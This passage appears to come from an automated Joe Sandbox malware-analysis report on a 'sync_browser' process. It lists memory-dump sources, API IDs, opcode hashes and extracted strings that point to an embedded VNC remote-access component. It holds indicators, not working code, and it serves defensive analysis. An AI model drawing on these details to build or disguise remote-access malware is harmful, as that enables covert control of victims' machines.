                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
                                                                                          • String ID: c
                                                                                          • API String ID: 295735435-112844655
                                                                                          • Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                                          • Instruction ID: 16d2a13c8dc93ca4e66fac70cd680413ea05229877d410915028443f6eac57ce
                                                                                          • Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                                          • Instruction Fuzzy Hash: 4221DF26A28A4183EA20DF65F4540AAA374FB98B91F541032EB9F87765DF3DE449C740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CountEnterLeaveTick
                                                                                          • String ID:
                                                                                          • API String ID: 1056156058-0
                                                                                          • Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                                          • Instruction ID: 97d80cc149c10b353e329d60774f25e4be3b3a6beef0cddbe24cb48d06b7b547
                                                                                          • Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                                          • Instruction Fuzzy Hash: 24D16377A19B4685EB20CF29E4412A973E9FB65B88F405136FA5C87B68DF3CE419C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Combine$DataDeleteObjectRegion$free
                                                                                          • String ID:
                                                                                          • API String ID: 1378972593-0
                                                                                          • Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                                          • Instruction ID: e977d45f9f437af1aad40daaceb3dd29ed5ac9b8b1aeeb50e0fd4ae3dcc589e6
                                                                                          • Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                                          • Instruction Fuzzy Hash: 1571E1B7A146818AEB50CF2AE4405ADBBA1FB58BD4B149032EF4D83754CF3CD495CB40
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$Free$Unlock$Lock$Allocfree
                                                                                          • String ID:
                                                                                          • API String ID: 2417228145-0
                                                                                          • Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                                                          • Instruction ID: 5f7b6e2f80f0adae1adcdd1ce2144a3185b4e7bee4ccc7429a6d34fa822b0d9c
                                                                                          • Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                                                          • Instruction Fuzzy Hash: 56510877A15B4685DB508F2AE4802E8B7A4FBA8F98F094036DE5D87768DF38D488D710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
                                                                                          • String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
                                                                                          • API String ID: 524037307-261918508
                                                                                          • Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                                          • Instruction ID: 82c43758c4dc4386164a62eff6e4c36cfa795b0d1145d6359e8c9524e436541f
                                                                                          • Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                                          • Instruction Fuzzy Hash: 1421F433514B8291D701DF24E9842E8B3ACFF64B88F584136EA4C4B6A9DF3D9299C314
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$CloseInputOpen
                                                                                          • String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 1367241101-2270697846
                                                                                          • Opcode ID: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
                                                                                          • Instruction ID: 3085f53276cc362bf4635ab5bccc8f739e1d79f7887e2cc9c504e683504deb43
                                                                                          • Opcode Fuzzy Hash: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
                                                                                          • Instruction Fuzzy Hash: 79D1C423A28AC185FB50CB25C4587FE3BA5EBA5B84F594171EA4C8B7A5DF3CD849C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
                                                                                          • String ID: <unavailable>$Default
                                                                                          • API String ID: 424836046-797050109
                                                                                          • Opcode ID: 98fc22b2c741167fb21f147bf9af3384dc3264d7e77bf2663b2028b435dc0a59
                                                                                          • Instruction ID: 63b945c39fae594686ab1eb9dedda9f6b5e56b024f9d0e3e9171ed99197d212c
                                                                                          • Opcode Fuzzy Hash: 98fc22b2c741167fb21f147bf9af3384dc3264d7e77bf2663b2028b435dc0a59
                                                                                          • Instruction Fuzzy Hash: 92617D27A28A4682EB64DB25D85427D73A4FB94F84F144135EE0E8B795DF3CD959C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                                                          • API String ID: 145871493-4083478734
                                                                                          • Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                                          • Instruction ID: 799f3529160f7f1d5372f5a25f12c48d4a02fdc8846eccda2b1f60e2ccf9a589
                                                                                          • Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                                          • Instruction Fuzzy Hash: D241A537A19B8295EB61CF16E84026AB2A4FFA4750F580135ED9DC3798EF3CE45AC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
                                                                                          • String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
                                                                                          • API String ID: 2822070703-2230024269
                                                                                          • Opcode ID: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                                                          • Instruction ID: b3ab0049892aad68c98ee2c843b711c59f8c7c0e439dd527e5d56c7edeeb28f0
                                                                                          • Opcode Fuzzy Hash: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                                                          • Instruction Fuzzy Hash: 57415827B6CB8195EB50CF19F8542A9A3A4FB58790F404236E96D877D4DF3CE508C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
                                                                                          • String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                                          • API String ID: 82840795-1493190668
                                                                                          • Opcode ID: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                                                          • Instruction ID: f1eaf379f9bae61cec622c4f8c6a665d85703578a60d002cf17c4f39ad2704b1
                                                                                          • Opcode Fuzzy Hash: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                                                          • Instruction Fuzzy Hash: FD218563F3894390FB84DBA5E9441F6935AAFB8744F485072F91ECA165DE3CE58D8200
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
                                                                                          • String ID: VncEvent
                                                                                          • API String ID: 2428488660-2681191898
                                                                                          • Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                                          • Instruction ID: 42e733fefa578ec2508ec69c2a4669e0bdc88103bbb564ee3146c69bf06dcf81
                                                                                          • Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                                          • Instruction Fuzzy Hash: AD117712F2C64342FF548F25EA543799395EFA9B89F085070F90EC6790DE2CA44DCB10
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
                                                                                          • String ID:
                                                                                          • API String ID: 2697342021-0
                                                                                          • Opcode ID: 07e862b9386f2056e9fc849ddc299adfbd19194fd9753bd57056fa84474d4813
                                                                                          • Instruction ID: 63b2090100238ca420ab7e29450e772cc84ad5d3ef99eb82db920653bbbd82e3
                                                                                          • Opcode Fuzzy Hash: 07e862b9386f2056e9fc849ddc299adfbd19194fd9753bd57056fa84474d4813
                                                                                          • Instruction Fuzzy Hash: A3818F27A28A8195EB10DF74D4543ED2764EF54BA8F440235EE2D9BAE9CF3CD149C314
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                                                          • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                                                          • API String ID: 173432231-678763868
                                                                                          • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                                          • Instruction ID: de3997ed1a99df6dd0c00b60df5583dfd18ad66ea63aec799e3c4f1bde4a054e
                                                                                          • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                                          • Instruction Fuzzy Hash: C8411132729B41A2E748DF24E9802E9B3A8FB54754F504135E7AD837A0DFBDA4B9C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
